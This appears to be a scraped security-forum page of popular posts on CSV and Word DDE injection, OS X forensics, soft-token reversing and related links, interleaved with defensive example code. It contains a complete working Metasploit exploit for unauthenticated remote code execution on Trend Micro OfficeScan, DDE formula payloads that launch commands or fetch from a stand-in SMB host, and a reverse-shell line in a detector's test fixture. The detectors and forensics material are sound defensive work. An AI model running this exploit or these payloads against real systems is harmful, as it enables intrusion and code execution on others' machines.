Leaderboard
Popular Content
Showing content with the highest reputation on 10/11/17 in all areas
-
https://www.udemy.com/seo-training-link-building-backlinks-and-keyword-research/?couponCode=FREENOW
https://www.udemy.com/insider-secrets-from-an-ethical-hacker-on-internet-safety/?couponCode=ISUFULLPROMO2017
https://www.udemy.com/python-complete/?couponCode=FREEFB4

250 Free Coupons Udemy Courses: https://justpaste.it/1c5r5

I can't guarantee that all 250 courses are free, but you will find something that interests you.
-
https://www.profit.ro/stiri/exclusiv-atac-informatic-pe-intreaga-baza-de-date-astra-asigurari-lichidatorul-spune-ca-atacatorii-au-cerut-rascumparare-17326468
-
Another recent article on the same subject - http://georgemauer.net/2017/10/07/csv-injection.html. There are a few nice things that can be done with DDE:

    =cmd|'/C calc'!A0 (the classic example)
    =IExplore|WWW_OpenURL!www.mataigrasa.com
    =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0

Most of the time I have run into this in web applications that generate reports in CSV/XLS format, where you have some control over the data that goes into the report.
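As an added example (not from the post or the linked article), here is how a web application that emits CSV reports can neutralize the formula and DDE triggers listed above before the file reaches a spreadsheet. It relies on the Excel/LibreOffice convention that a leading apostrophe forces a cell to be treated as text; the column names, the `neutralize_cell`/`write_report` helpers and the sample rows are constructed for illustration.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell instead of displaying it.
# Tab and carriage return are included because a cell beginning with one of them followed
# by '=' is still treated as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return `value` in a form a spreadsheet will show as text.

    A leading apostrophe is the spreadsheet convention for "this is text";
    the csv module's own quoting is not sufficient, because Excel strips the
    double quotes and still evaluates a leading '='. Non-string values
    (numbers, None) are returned unchanged.
    """
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def write_report(rows, fieldnames):
    """Serialize a list of dicts to CSV text with every cell neutralized and fully quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: neutralize_cell(row.get(name)) for name in fieldnames})
    return buf.getvalue()


# Constructed sample: user-controlled report data carrying the payloads from the post.
SAMPLE_ROWS = [
    {"user": "alice", "comment": "looks fine"},
    {"user": "mallory", "comment": "=cmd|'/C calc'!A0"},
    {"user": "mallory", "comment": "=IExplore|WWW_OpenURL!www.mataigrasa.com"},
    {"user": "mallory", "comment": "=regsvr32|\\\\<fakeSmbServer>\\\\mataigrasa!A0"},
    {"user": "bob", "comment": "-5 degrees today"},
]

if __name__ == "__main__":
    print(write_report(SAMPLE_ROWS, ["user", "comment"]))
```

The apostrophe is visible if the file is re-imported elsewhere, which is the price of making the cell inert; legitimate negative numbers should be emitted as numeric types rather than strings so they are not prefixed. Quoting every field also keeps an attacker from smuggling a separator into the row, but it does nothing for the `=` case on its own, which is why the prefix is needed.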
-
OS X Auditor is a free Mac OS X computer forensics tool.

OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
- the kernel extensions
- the system agents and daemons
- the third party's agents and daemons
- the old and deprecated system and third party's startup items
- the users' agents
- the users' downloaded files
- the installed applications

It extracts:
- the users' quarantined files
- the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
- the users' Firefox cookies, downloads, formhistory, permissions, places and signons
- the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
- the users' social and email accounts
- the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist themselves.

It can verify the reputation of each file on:
- Team Cymru's MHR
- VirusTotal
- your own local database

It can aggregate all logs from the following directories into a zipball:
- /var/log (-> /private/var/log)
- /Library/logs
- the user's ~/Library/logs

Finally, the results can be:
- rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)
- rendered as a HTML log file
- sent to a Syslog server

Author
Jean-Philippe Teissier - @Jipe_ & al.

Support
OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector).

How to install
Just copy all files from GitHub.

Dependencies
If you plan to run OS X Auditor on a Mac, you will get full plist parsing support with the OS X Foundation through pyobjc:
    pip install pyobjc

If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some trouble with the plist parsing:
    pip install biplist
    pip install plist

These dependencies will be removed when a working native plist module is available in python.

How to run
OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare).

OS X Auditor is maintained to work on the latest OS X version. It will do its best on older OS X versions.

You must run it as root (or via sudo) if you want to use it on a running system, otherwise it won't be able to access some system and other users' files.

If you're using API keys from environment variables (see below), you need to use sudo -E to use the user's environment variables.

Type osxauditor.py -h to get all the available options, then run it with the selected options, e.g.:
    [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Setting Environment Variables
VirusTotal API:
    export VT_API_KEY=aaaabbbbccccddddeeee

Changelog

Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git
Source: https://github.com/jipegit/OSXAuditor
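Added example, not part of OS X Auditor's code: a minimal Python 3 re-creation of two of the checks described above, hashing launch agent/daemon plists against a local hash database and looking for suspicious keywords in their program arguments. The directory list mirrors the standard launchd locations; the keyword list, the `audit_launch_items`/`make_sample_dir` names and the two sample plists are this example's own assumptions, and the sample runs against a temporary directory rather than a live system.

```python
import hashlib
import os
import plistlib
import tempfile

# launchd persistence locations (system, third party and the current user's agents).
PERSISTENCE_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    "/System/Library/LaunchAgents",
    "/System/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
]

# Assumed keyword list for illustration; OS X Auditor ships its own, which is not copied here.
SUSPICIOUS_KEYWORDS = ("/tmp/", "/private/tmp/", "curl ", "nc ", "python -c", "bash -i", "base64")


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_launch_items(dirs, known_hashes):
    """Hash every .plist under `dirs`, compare with a local allow-list, and inspect the command line.

    `known_hashes` plays the role of the "own local database" from the README: a set of
    SHA-256 hex digests of plists already vetted. Returns a list of (path, reason) findings.
    """
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            digest = sha256_file(path)
            if digest not in known_hashes:
                findings.append((path, "hash not in local database: %s" % digest))
            try:
                with open(path, "rb") as f:
                    data = plistlib.load(f)  # handles both XML and binary plists
            except Exception as exc:
                findings.append((path, "unparseable plist: %s" % exc))
                continue
            args = list(data.get("ProgramArguments", []))
            if isinstance(data.get("Program"), str):
                args.insert(0, data["Program"])
            cmdline = " ".join(str(a) for a in args)
            for kw in SUSPICIOUS_KEYWORDS:
                if kw in cmdline:
                    findings.append((path, "suspicious keyword %r in %s" % (kw, cmdline)))
    return findings


def make_sample_dir():
    """Constructed sample: one benign agent and one that spawns a reverse shell at login."""
    d = tempfile.mkdtemp()
    benign = {"Label": "com.example.updater", "ProgramArguments": ["/usr/bin/true"], "RunAtLoad": True}
    evil = {
        "Label": "com.apple.fake",
        "ProgramArguments": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"],
        "RunAtLoad": True,
    }
    for fname, payload in (("com.example.updater.plist", benign), ("com.apple.fake.plist", evil)):
        with open(os.path.join(d, fname), "wb") as f:
            plistlib.dump(payload, f)
    return d


if __name__ == "__main__":
    sample = make_sample_dir()
    vetted = {sha256_file(os.path.join(sample, "com.example.updater.plist"))}
    for path, reason in audit_launch_items([sample], vetted):
        print(path, "->", reason)
```

To run this against a real machine, pass `PERSISTENCE_DIRS` instead of the sample directory and run it with sudo so the system directories are readable; hashes of a clean baseline become `known_hashes`, exactly the workflow the `-l localhashes.db` option above implies.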
-
What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?!

Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. In our context DDE works by executing an application that will provide the data (data provider).

In a previous post [1] we discussed using DDE in MSExcel to gain command execution, and have had great success in using this technique to bypass macro filtering mail gateways and corporate VBA policies. DDE isn't only limited to Excel, and Word has had DDE capabilities all this time. This has been mentioned by others [2] as a possible avenue, but to our knowledge, no-one has actually demonstrated this to work.

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

I tried it in Word 2010 and it works.
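An added example (not SensePost's code): a detector for the DDE/DDEAUTO field codes the post describes, run over a .docx constructed in memory. It relies only on the OOXML field structure (`w:fldChar` begin/end markers around `w:instrText` runs, or a `w:fldSimple` element with a `w:instr` attribute); the `find_dde_fields` name, the choice to scan every `word/*.xml` part (so headers, footers and footnotes are covered) and the sample document are this example's own.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
# Match the DDE / DDEAUTO keyword anywhere in a field code, case-insensitively.
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def extract_field_codes(xml_bytes):
    """Return every field code in one WordprocessingML part, in document order.

    Complex fields are delimited by <w:fldChar w:fldCharType="begin"/> ... "end"/>, and their
    code is spread over one or more <w:instrText> runs. Attackers split the keyword across
    runs on purpose, so all runs of a field are concatenated before matching. Simple fields
    carry the code in the w:instr attribute of <w:fldSimple>.
    """
    root = ET.fromstring(xml_bytes)
    codes, current, depth = [], [], 0
    for el in root.iter():
        if el.tag == W + "fldSimple":
            codes.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth:
                depth -= 1
                if depth == 0:
                    codes.append("".join(current))
                    current = []
        elif el.tag == W + "instrText" and depth:
            current.append(el.text or "")
    return codes


def find_dde_fields(docx_bytes):
    """Scan every word/*.xml part of a .docx; return (part name, normalized field code) for DDE fields."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            for code in extract_field_codes(z.read(name)):
                if DDE_RE.search(code):
                    hits.append((name, " ".join(code.split())))
    return hits


def build_sample_docx(field_code):
    """Constructed minimal .docx with one complex field whose code is split over two runs (sample input)."""
    body = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    half = len(field_code) // 2
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", body % (W_NS, field_code[:half], field_code[half:]))
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx(' DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" ')
    for part, code in find_dde_fields(doc):
        print(part, "->", code)
```

String matching on field codes catches the straightforward payload; later in-the-wild samples hid the keyword behind a nested `QUOTE` field that assembles it from character codes at render time, so a stricter policy is to flag any field code that is not in a short allow-list (`PAGE`, `TOC`, `REF`, ...) rather than to look for `DDE` alone.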
-
BRIEF CONTENTS
Foreword by Matt Graeber
Preface
Chapter 1: C# Crash Course
Chapter 2: Fuzzing and Exploiting XSS and SQL Injection
Chapter 3: Fuzzing SOAP Endpoints
Chapter 4: Writing Connect-Back, Binding, and Metasploit Payloads
Chapter 5: Automating Nessus
Chapter 6: Automating Nexpose
Chapter 7: Automating OpenVAS
Chapter 8: Automating Cuckoo Sandbox
Chapter 9: Automating sqlmap
Chapter 10: Automating ClamAV
Chapter 11: Automating Metasploit
Chapter 12: Automating Arachni
Chapter 13: Decompiling and Reversing Managed Assemblies
Chapter 14: Reading Offline Registry Hives

https://www.google.ro/url?sa=t&source=web&rct=j&url=https://dl.kuroy.me/foreign/learnflakes/Brandon%20Perry%20-%20Gray%20Hat%20C%23/Brandon%20Perry%20-%20Gray%20Hat%20C%23_%20A%20Hacker%27s%20Guide%20to%20Creating%20and%20Automating%20Security%20Tools.pdf&ved=0ahUKEwjk_NfE74nYAhVS46QKHQNyCC4QFggjMAA&usg=AOvVaw1eTppV_6dAAZgoATyu8nOR
https://smtebooks.com/Downloads/5794/gray-hat-c-pdf
https://github.com/brandonprry/gray_hat_csharp_code
https://books.google.ro/books?id=uAYvDwAAQBAJ&pg=PA130&lpg=PA130&dq=Gray+Hat+C%23:+Creating+and+Automating+Security+Tools+pdf&source=bl&ots=ZmCsAeFAsJ&sig=TmcTTAcgaYNH5c6nwy33VaY6fhQ&hl=ro&sa=X&ved=0ahUKEwiKnZr3w-bWAhXMKVAKHexJAA04ChDoAQgkMAE#v=onepage&q=Gray Hat C%23%3A Creating and Automating Security Tools pdf&f=false
-
This Metasploit module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user. The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes act and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to the combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Trend Micro OfficeScan Remote Code Execution",
      'Description'    => %q{
        This module exploits the authentication bypass and command injection vulnerability together.
        Unauthenticated users can execute a terminal command under the context of the web server user.

        The specific flaw exists within the management interface, which listens on TCP port 443 by default.
        The Trend Micro Officescan product has a widget feature which is implemented with PHP.
        Talker.php takes act and hash parameters but doesn't validate these values, which leads to
        an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take
        multiple parameters but the process does not properly validate a user-supplied string before
        using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated
        users can execute a terminal command under the context of the web server user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <mr_me@offensive-security.com>', # author of command injection
          'Mehmet Ince <mehmet@mehmetince.net>'   # author of authentication bypass & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
        ],
      'DefaultOptions' =>
        {
          'SSL'   => true,
          'RPORT' => 443
        },
      'Platform'       => ['win'],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }],
          ['OfficeScan 11', {}],
          ['OfficeScan XG', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 7 2017",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
      ]
    )
  end

  def build_csrftoken(my_target, phpsessid=nil)
    vprint_status("Building csrftoken")
    if my_target.name == 'OfficeScan XG'
      csrf_token = Rex::Text.md5(Time.now.to_s)
    else
      csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0]
    end
    csrf_token
  end

  def auto_target
    # XG version of the widget library has package.json within the same directory.
    mytarget = target
    if target['auto'] && target.name =~ /Automatic/
      print_status('Automatic targeting enabled. Trying to detect version.')
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'),
      })
      if res && res.code == 200
        mytarget = targets[2]
      elsif res && res.code == 404
        mytarget = targets[1]
      else
        fail_with(Failure::Unknown, 'Unable to automatically select a target')
      end
      print_status("Selected target system : #{mytarget.name}")
    end
    mytarget
  end

  def auth(my_target)
    # Version XG performs MD5 validation on wf_CSRF_token parameter.
    # We can't simply use PHPSESSID directly because it contains a-zA-Z0-9.
    # Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie.
    if my_target.name == 'OfficeScan XG'
      csrf_token = build_csrftoken(my_target)
      cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}"
    # Version 11 want to see valid PHPSESSID from beginning to the end.
    # For this reason we need to force backend to initiate one for us.
    else
      vprint_status("Sending session initiation request for : #{my_target.name}.")
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'),
      })
      cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}"
      csrf_token = build_csrftoken(my_target, res.get_cookies)
    end

    # Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version.
    # Now we need to exploit authentication bypass vulnerability.
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
      'headers' => {
        'X-CSRFToken' => csrf_token,
        'ctype'       => 'application/x-www-form-urlencoded; charset=utf-8'
      },
      'cookie'  => cookie,
      'vars_post' => {
        'cid'  => '1',
        'act'  => 'check',
        'hash' => Rex::Text.rand_text_alpha(10),
        'pid'  => '1'
      }
    })

    if res && res.code == 200 && res.body.include?('login successfully')
      # Another business logic in here.
      # Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php
      # Version XG want to use newly created PHPSESSID that comes from auth bypass response.
      if my_target.name == 'OfficeScan XG'
        res.get_cookies
      else
        cookie
      end
    else
      nil
    end
  end

  def check
    my_target = auto_target
    token = auth(my_target)

    # If we dont have a cookie that means authentication bypass issue has been patched on target system.
    if token.nil?
      Exploit::CheckCode::Safe
    else
      # Authentication bypass does not mean that we have a command injection.
      # Accessing to the widget framework without having command injection means literally nothing.
      # So we gonna trigger command injection vulnerability without a payload.
      csrf_token = build_csrftoken(my_target, token)
      vprint_status('Trying to detect command injection vulnerability')
      res = send_request_cgi({
        'method'  => 'POST',
        'uri'     => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
        'headers' => {
          'X-CSRFToken' => csrf_token,
          'ctype'       => 'application/x-www-form-urlencoded; charset=utf-8'
        },
        'cookie'  => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}",
        'vars_post' => {
          'module'   => 'modTMCSS',
          'serverid' => '1',
          'TOP'      => ''
        }
      })

      if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed')
        Exploit::CheckCode::Vulnerable
      else
        Exploit::CheckCode::Safe
      end
    end
  end

  def exploit
    mytarget = auto_target

    print_status('Exploiting authentication bypass')
    cookie = auth(mytarget)

    if cookie.nil?
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Authentication successfully bypassed.")
    end

    print_status('Generating payload')
    powershell_options = {
      encode_final_payload: true,
      remove_comspec: true
    }
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)

    # We need to craft csrf value for version 11 again like we did before at auth function.
    csrf_token = build_csrftoken(mytarget, cookie)

    print_status('Triggering command injection vulnerability')
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
      'headers' => {
        'X-CSRFToken' => csrf_token,
        'ctype'       => 'application/x-www-form-urlencoded; charset=utf-8'
      },
      'cookie'  => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}",
      'vars_post' => {
        'module'   => 'modTMCSS',
        'serverid' => '1',
        'TOP'      => "2>&1||#{p}"
      }
    })
  end
end
```
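Added example for the defensive side (not part of the module): a classifier that flags the two requests the module sends, using only the paths, parameter names and cookie values visible in the module above. Requests are parsed from constructed raw-HTTP samples, so it runs offline; the `LogonUser=root` cookie is a marker for this particular tool rather than for the vulnerability, and a patched server still receives the same requests, so this detects attempts, not success. Function and constant names are this example's own.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

WIDGET_ROOT = "/officescan/console/html/widget/"
# Metacharacters needed to break out of the command the widget proxy builds;
# "2>&1||" is the exact prefix the Metasploit module puts in front of its payload.
INJECTION_MARKERS = ("|", "&", ";", "`", "$(", "2>&1")
# Cookie value the module hard-codes: an indicator for this tool, not for the bug itself.
MODULE_COOKIE_MARKER = "LogonUser=root"


def parse_raw_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased names) and a form body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": urlsplit(target).path, "headers": headers, "form": form}


def classify_officescan_request(req):
    """Return the reasons a request looks like the ZDI-17-521 chain, or [] if it looks benign."""
    reasons = []
    path = req["path"].lower()
    if req["method"] != "POST" or not path.startswith(WIDGET_ROOT):
        return reasons
    form, cookie = req["form"], req["headers"].get("cookie", "")
    if path.endswith("/ui/modlogin/talker.php") and form.get("act") == "check" and MODULE_COOKIE_MARKER in cookie:
        reasons.append("talker.php act=check with the module's forged LogonUser cookie (auth bypass attempt)")
    if path.endswith("/proxy_controller.php") and form.get("module") == "modTMCSS":
        for name, value in form.items():
            if any(marker in value for marker in INJECTION_MARKERS):
                reasons.append("shell metacharacters in proxy_controller.php parameter %s: %r" % (name, value[:60]))
    return reasons


def build_request(method, path, form=None, cookie=""):
    """Constructed sample traffic (not a real capture); bodies are form-encoded as the module sends them."""
    body = urlencode(form or {})
    headers = ["Host: officescan.example.internal", "Content-Type: application/x-www-form-urlencoded"]
    if cookie:
        headers.append("Cookie: " + cookie)
    if body:
        headers.append("Content-Length: %d" % len(body))
    return "%s %s HTTP/1.1\r\n%s\r\n\r\n%s" % (method, path, "\r\n".join(headers), body)


SAMPLE_REQUESTS = {
    "auth_bypass": build_request(
        "POST", WIDGET_ROOT + "ui/modLogin/talker.php",
        {"cid": "1", "act": "check", "hash": "abcdefghij", "pid": "1"},
        cookie="LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=deadbeef"),
    "cmd_injection": build_request(
        "POST", WIDGET_ROOT + "proxy_controller.php",
        {"module": "modTMCSS", "serverid": "1", "TOP": "2>&1||powershell -nop -w hidden -e AAAA"}),
    "benign_widget": build_request(
        "POST", WIDGET_ROOT + "proxy_controller.php",
        {"module": "modTMCSS", "serverid": "1", "TOP": "10"}),
}

if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(label, "->", classify_officescan_request(parse_raw_request(raw)) or "benign")
```

Because the exploit runs over TLS on port 443, these rules only fire where traffic is decrypted (a reverse proxy or WAF in front of the console, or the web server's own request logging with bodies enabled); a plain access log does not contain the POST body that carries TOP.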
-
Hacking Soft Tokens
Advanced Reverse Engineering on Android
Bernhard Mueller
© 2016 Vantage Point Security Pte. Ltd.

Table of Contents
Introduction
Mobile One-Time Password Token Overview
- OATH TOTP
- Proprietary Algorithms
- Provisioning
- Attacks
  - Retrieval from Memory
  - Code Lifting and Instrumentation
The Android Reverser's Toolbox
- De-Compilers, Disassemblers and Debuggers
- Tracing Java Code
- Tracing Native Code
- Tracing System Calls
- Classic Linux Rootkit Style
- Dynamic Analysis Frameworks
- Drawbacks Emulation-based Analysis
- Runtime Instrumentation with Frida
Building A Sandbox
- Sandbox Overview
- Customizing the Kernel
- Customizing the RAMDisk
- Booting the Environment
- Customizing ART
- Hooking System Calls
- Automating System Call Hooking with Zork
Case Studies
- RSA SecurID: ProGuard and a Proprietary Algorithm
  - Analyzing ProGuard-processed Bytecode
  - Data Storage and Runtime Encryption
  - Tool Time: RSACloneId
  - Vendor Response
  - Summary
- Vasco DIGIPASS: Advanced Anti-Tampering
  - Initial Analysis
  - Root Detection and Integrity Checks
  - Native Debugging Defenses
  - JDWP Debugging Defenses
  - Static-dynamic Analysis
  - Attack Outline
  - Tool Time: VasClone
  - Vendor Comments
  - Summary
TL; DR
- Attack Mitigation
- Software Protection Effectiveness
REFERENCES

Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf
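An added example (not from the paper): the OATH TOTP computation covered in the paper's first section, in Python, checked against the RFC 6238 reference seed. It makes the point of the memory-retrieval and code-lifting attacks concrete: whoever obtains the seed bytes computes exactly the codes the token would. The `verify` helper and its window size are this example's own choices.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226 HOTP: HMAC over the big-endian 8-byte counter, dynamic truncation, mod 10^digits."""
    msg = struct.pack(">Q", counter)
    mac = hmac.new(secret, msg, algo).digest()
    offset = mac[-1] & 0x0F                                   # low nibble of the last byte picks the window
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, for_time=None, step=30, t0=0, digits=6, algo=hashlib.sha1):
    """RFC 6238 TOTP: HOTP with counter = floor((time - T0) / step)."""
    if for_time is None:
        for_time = time.time()
    return hotp(secret, int((for_time - t0) // step), digits, algo)


def verify(secret, code, at_time=None, window=1, **kw):
    """Server-side check: accept `code` for the current step or up to `window` steps either side."""
    if at_time is None:
        at_time = time.time()
    step = kw.get("step", 30)
    return any(totp(secret, at_time + i * step, **kw) == code for i in range(-window, window + 1))


# RFC 6238 Appendix B test seed (ASCII "12345678901234567890"). A real soft token keeps this
# in protected storage; once it is lifted from memory, a clone needs nothing else.
RFC6238_SEED = b"12345678901234567890"

if __name__ == "__main__":
    for t in (59, 1111111109, 1234567890):
        print(t, totp(RFC6238_SEED, t, digits=8))
    print("now", totp(RFC6238_SEED))
```

Proprietary schemes (the RSA SecurID case study) swap the HMAC for their own function and add per-device data to the input, but the structure is the same: a secret plus a time-derived counter in, a short code out. That is why the paper's attack outline for both vendors ends in a clone tool rather than in anything cryptographic.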
-
Yes, interesting, but the exploitation methods (classic and via DDE) are already known from exploiting CSV injection (https://www.contextis.com/blog/comma-separated-vulnerabilities). Good to know that it works in Word as well; a pity that in this case too, two alerts pop up.
-
https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/